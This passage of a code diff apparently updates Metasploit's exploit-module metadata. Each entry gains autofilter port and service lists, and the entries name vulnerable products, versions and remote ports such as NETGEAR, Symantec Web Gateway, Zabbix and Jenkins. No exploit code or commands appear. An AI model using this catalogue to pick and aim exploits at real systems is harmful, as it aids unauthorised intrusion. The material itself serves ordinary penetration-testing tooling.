"targets": [ "Automatic Target" ], @@ -37103,6 +49402,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "NETGEAR ReadyNAS 4.2.23" ], @@ -37137,6 +49451,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "NETGEAR WNR2000v5" ], @@ -37173,6 +49502,12 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Ubuntu 13.04 32bit - nginx 1.4.0", "Debian Squeeze 32bit - nginx 1.4.0" @@ -37208,6 +49543,21 @@ "platform": "Unix", "arch": "cmd", "rport": 8081, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "NUUO NVRmini 2", @@ -37245,6 +49595,21 @@ "platform": "Unix", "arch": "cmd", "rport": 8081, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "NUUO NVRmini 2", @@ -37280,6 +49645,21 @@ "platform": "Linux,Unix", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -37314,6 +49694,21 @@ "platform": "Unix", "arch": "cmd", "rport": 446, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -37345,6 +49740,21 @@ "platform": "Unix", "arch": "cmd", "rport": 8023, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Pandora 5.0RC1" ], @@ -37378,6 +49788,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Pandora FMS version <= 5.0 SP2" ], @@ -37412,6 +49837,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -37445,6 +49885,12 @@ "platform": "Linux", "arch": "x86", "rport": 7144, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "PeerCast v0.1212 Binary" ], @@ -37478,6 +49924,21 @@ "platform": "Unix", "arch": "cmd", "rport": 7443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "PineApp Mail-SeCure 3.70" ], @@ -37511,6 +49972,21 @@ "platform": "Unix", "arch": "cmd", "rport": 7443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "PineApp Mail-SeCure 3.70" ], @@ -37545,6 +50021,21 @@ "platform": "Unix", "arch": "cmd", "rport": 7443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "PineApp Mail-SeCure 3.70" ], @@ -37576,6 +50067,21 @@ "platform": "Unix", "arch": "cmd", "rport": 1471, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "WiFi Pineapple 2.0.0 - 2.3.0" ], @@ -37607,6 +50113,21 @@ "platform": "Unix", "arch": "cmd", "rport": 1471, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "WiFi Pineapple 2.0.0 - 2.3.0" ], @@ -37643,6 +50164,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic (piranha-gui-0.4.12-1.i386.rpm)" ], @@ -37681,6 +50217,21 @@ "platform": "Linux", "arch": "x86, x64", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Auto" ], @@ -37716,6 +50267,21 @@ "platform": "Unix", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -37749,6 +50315,21 @@ "platform": "Unix", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -37780,6 +50361,21 @@ "platform": "Linux", "arch": "x64", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux" ], @@ -37815,6 +50411,21 @@ "platform": "", "arch": "", "rport": 52869, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "MIPS Little Endian", "MIPS Big Endian" @@ -37847,6 +50458,21 @@ "platform": "Linux", "arch": "x64", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Riverbed SteelCentral NetProfiler 10.8.7 / Riverbed NetExpress 10.8.7" ], @@ -37883,6 +50509,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Samsung SRN-1670D 1.0.0.193" ], @@ -37919,6 +50560,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -37952,6 +50608,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware SMT_X9_214" ], @@ -37985,6 +50656,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Sophos Web Protection Appliance 3.8.1.1" ], @@ -38021,6 +50707,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Sophos Web Protection Appliance 3.7.0" ], @@ -38056,6 +50757,21 @@ "platform": "Linux", "arch": "x86, x64", "rport": 9001, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "3.0a1-3.3.2" ], @@ -38088,6 +50804,21 @@ "platform": "Python", "arch": "python", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -38124,6 +50855,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Symantec Web Gateway 5.0.2.8" ], @@ -38160,6 +50906,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Symantec Web Gateway 5.0.2.8" ], @@ -38196,6 +50957,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Symantec Web Gateway 5.0.2.8" ], @@ -38232,6 +51008,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Symantec Web Gateway 5.0.2.18" ], @@ -38268,6 +51059,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Symantec Web Gateway 5" ], @@ -38300,6 +51106,21 @@ "platform": "Unix", "arch": "cmd", "rport": 5000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -38333,6 +51154,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -38364,6 +51200,23 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 23, + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "telnet", + "http", + "https" + ], "targets": [ "Automatic" ], @@ -38403,6 +51256,21 @@ "platform": "", "arch": "", "rport": 7547, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "MIPS Big Endian", "MIPS Little Endian" @@ -38436,6 +51304,21 @@ "platform": "Python", "arch": "python", "rport": 8445, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -38469,6 +51352,21 @@ "platform": "Python", "arch": "python", "rport": 8445, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -38500,6 +51398,21 @@ "platform": "Linux", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux" ], @@ -38533,6 +51446,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Billion 5200W-T" ], @@ -38566,6 +51494,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "P660HN-T v1" ], @@ -38599,6 +51542,21 @@ "platform": "Linux", "arch": "mipsbe", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "P660HN-T v2" ], @@ -38634,6 +51592,21 @@ "platform": "Linux", "arch": "x86", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "UEB 9.*" ], @@ -38671,6 +51644,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -38706,6 +51694,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)", "Linux x86" @@ -38739,6 +51742,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -38773,6 +51791,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -38807,6 +51840,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "WebCalendar 1.2.4 on Linux" ], @@ -38841,6 +51889,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "WeBid 1.0.2 / Ubuntu" ], @@ -38872,6 +51935,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "WiPG-1000 <=2.0.0.7" ], @@ -38905,6 +51983,21 @@ "platform": "Unix", "arch": "cmd", "rport": 9876, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -38938,6 +52031,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Zabbix version <= 2.0.8" ], @@ -38970,6 +52078,21 @@ "platform": "Unix", "arch": "cmd", "rport": 444, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -39002,6 +52125,21 @@ "platform": "Unix", "arch": "cmd", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -39037,6 +52175,21 @@ "platform": "Unix", "arch": "cmd", "rport": 40007, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "AlienVault <= 4.6.1" ], @@ -39070,6 +52223,12 @@ "platform": "Linux", "arch": "", "rport": 9080, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Debian 3.1 Sarge" ], @@ -39105,6 +52264,12 @@ "platform": "Linux", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux Bruteforce" ], @@ -39149,6 +52314,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -39190,6 +52361,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -39232,6 +52409,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -39276,6 +52459,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -39307,6 +52496,12 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -39342,6 +52537,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux x86", "Linux x64" @@ -39393,6 +52594,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -39428,6 +52635,12 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Cron", "User Crontab", @@ -39461,6 +52674,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux x86", "Linux x86_64" @@ -39493,6 +52712,12 @@ "platform": "Linux", "arch": "x86, x64, armle, mipsle, mipsbe", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -39541,6 +52766,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Linux x86", @@ -39581,6 +52812,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Linux x86", @@ -39623,6 +52860,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -39657,6 +52900,12 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP System Management Homepage 7.1.1", "HP System Management Homepage 7.1.2" @@ -39693,6 +52942,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -39727,6 +52982,12 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Kloxo 6.1.12" ], @@ -39760,6 +53021,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -39798,6 +53065,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -39835,6 +53108,12 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Ubuntu" ], @@ -39876,6 +53155,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -39910,6 +53195,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux x86", "Linux x64" @@ -39946,6 +53237,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "CVE-2015-1328", "CVE-2015-8660" @@ -39981,6 +53278,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux x86", "Linux x64" @@ -40013,6 +53316,12 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -40052,6 +53361,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -40091,6 +53406,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -40122,6 +53443,12 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto", "System V", @@ -40165,6 +53492,12 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux x86" ], @@ -40200,6 +53533,12 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux x86" ], @@ -40235,6 +53574,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux x86", "Linux x64" @@ -40278,6 +53623,12 @@ "platform": "Linux", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -40315,6 +53666,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux x86", "Linux x64" @@ -40353,6 +53710,12 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -40385,6 +53748,12 @@ "platform": "Linux,Unix", "arch": "cmd, x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Command payload", "Linux x86" @@ -40419,6 +53788,12 @@ "platform": "Unix", "arch": "cmd", "rport": 8812, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -40454,6 +53829,12 @@ "platform": "Unix", "arch": "cmd", "rport": 9999, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -40487,6 +53868,12 @@ "platform": "Unix", "arch": "cmd", "rport": 8787, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Trap", @@ -40524,6 +53911,12 @@ "platform": "Linux", "arch": "x86", "rport": 2525, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "RedHat Linux 7.0 (Guinness)" ], @@ -40562,6 +53955,12 @@ "platform": "Linux", "arch": "armle", "rport": 4070, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -40594,6 +53993,12 @@ "platform": "Linux", "arch": "armle", "rport": 554, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "DS-7204 Firmware V2.2.10 build 131009", "Debug Target" @@ -40633,6 +54038,12 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP Data Protector 6.10/6.11/6.20 on Linux" ], @@ -40667,6 +54078,12 @@ "platform": "", "arch": "", "rport": 9100, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Unix (In-Memory)" ], @@ -40700,6 +54117,12 @@ "platform": "Unix", "arch": "cmd", "rport": 7426, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "HP NNMi 9.10 / CentOS 5", @@ -40737,6 +54160,12 @@ "platform": "Linux", "arch": "x86", "rport": 13838, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP VSA 9" ], @@ -40772,6 +54201,12 @@ "platform": "Unix", "arch": "cmd", "rport": 2207, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic (hplip-1.6.7-4.i386.rpm)" ], @@ -40807,6 +54242,12 @@ "platform": "Linux", "arch": "x86", "rport": 3050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253" ], @@ -40842,6 +54283,12 @@ "platform": "Linux", "arch": "x86", "rport": 3050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253" ], @@ -40877,6 +54324,12 @@ "platform": "Linux", "arch": "x86", "rport": 3050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253" ], @@ -40912,6 +54365,12 @@ "platform": "Linux", "arch": "x86", "rport": 3050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253" ], @@ -40953,6 +54412,12 @@ "platform": "Java", "arch": "java", "rport": "8080", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Jenkins 1.637" ], @@ -40991,6 +54456,12 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": "8080", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Jenkins 2.31" ], @@ -41030,6 +54501,12 @@ "platform": "Linux", "arch": "x86", "rport": 515, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Caldera OpenLinux 2.3 Bruteforce", @@ -41066,6 +54543,12 @@ "platform": "Linux", "arch": "", "rport": 27017, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux - mongod 2.2.3 - 32bits" ], @@ -41101,6 +54584,12 @@ "platform": "Unix", "arch": "cmd", "rport": 5666, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Nagios Remote Plugin Executor prior to 2.14" ], @@ -41135,6 +54624,12 @@ "platform": "", "arch": "", "rport": 53413, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MIPS Little Endian", "MIPS Big Endian" @@ -41173,6 +54668,12 @@ "platform": "Linux", "arch": "x86", "rport": 5405, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "linux" ], @@ -41211,6 +54712,12 @@ "platform": "Linux", "arch": "x86", "rport": 524, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Novell eDirectory 8.8.7 v20701.33/ SLES 10 SP3" ], @@ -41243,6 +54750,12 @@ "platform": "", "arch": "", "rport": 1099, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "OpenNMS / Linux x86", "OpenNMS / Linux x86_64" @@ -41279,6 +54792,12 @@ "platform": "Linux", "arch": "armle", "rport": 9251, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -41311,6 +54830,12 @@ "platform": "Unix", "arch": "cmd", "rport": 12345, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Quest Privilege Manager pmmasterd 6.0.0-27 x64", "Quest Privilege Manager pmmasterd 6.0.0-27 x86" @@ -41345,6 +54870,12 @@ "platform": "Linux", "arch": "", "rport": 32764, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic Linux MIPS Big Endian", "Generic Linux MIPS Little Endian", @@ -41391,6 +54922,12 @@ "platform": "Linux", "arch": "x86", "rport": 1743, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "UEB 9.*" ], @@ -41427,6 +54964,12 @@ "platform": "Unix", "arch": "cmd", "rport": 10051, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Zabbix 1.6.7" ], @@ -41463,6 +55006,12 @@ "platform": "Linux", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Debian 5.0 - MySQL (5.0.51a-24+lenny2)" @@ -41497,6 +55046,12 @@ "platform": "Linux", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MySQL 5.0.45-Debian_1ubuntu3.1-log" ], @@ -41534,6 +55089,12 @@ "platform": "Linux", "arch": "", "rport": 110, + "autofilter_ports": [ + + ], + 